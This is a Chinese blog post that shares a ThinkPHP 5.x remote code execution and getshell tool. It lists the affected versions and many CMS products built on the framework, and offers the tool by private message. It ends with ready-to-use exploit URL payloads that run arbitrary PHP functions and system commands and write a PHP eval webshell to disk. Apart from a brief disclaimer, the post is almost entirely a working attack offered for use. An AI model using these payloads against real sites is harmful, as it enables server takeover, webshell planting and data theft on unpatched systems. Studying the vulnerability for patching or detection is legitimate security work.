编程开源技术交流,分享技术与知识

网站首页 > 开源技术 正文

ThinkPHP 5.x远程命令执行测试工具(可getshell)

wxchong 2024-08-29 01:25:37 开源技术 9 ℃ 0 评论

有人私信问我这个工具,现在就分享给大家!

该工具只能授权验证网站漏洞和站长验证漏洞使用。

禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关。

影响范围

  • 5.x < 5.1.31
  • 5.x <= 5.0.23

以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。

  • AdminLTE后台管理系统
  • layui后台管理系统
  • thinkcmf
  • H-ui.admin后台管理系统
  • tpshop
  • FsatAdmin
  • eyoucms
  • LarryCMS后台管理系统
  • tpadmin后台管理系统
  • snake后台管理系统
  • ThinkSNS
  • DolphinPHP后台管理系统
  • WeMall商城系统
  • CLTPHP
  • 齐博CMS
  • DSMALL
  • YFCMF
  • HisiPHP后台管理系统
  • Tplay后台管理系统
  • lyadmin后台管理系统
  • haoid后台管理系统

漏洞验证

命令执行

getshell

下载地址:私信我关键字“getshell”自动获取下载链接

附上测试代码

#代码执行
?s=index/\think\Request/input&filter=phpinfo&data=1
#命令执行
?s=index/\think\Request/input&filter=system&data=系统命令
#getshell
?s=index/\think\template\driver\file/write&cacheFile=paylog.php&content=%3C?php%20eval($_POST[20208]);?%3Ehacker
#getshell2
?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
#代码执行
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
#命令执行
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
#代码执行
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
#命令执行
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令

Tags:

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表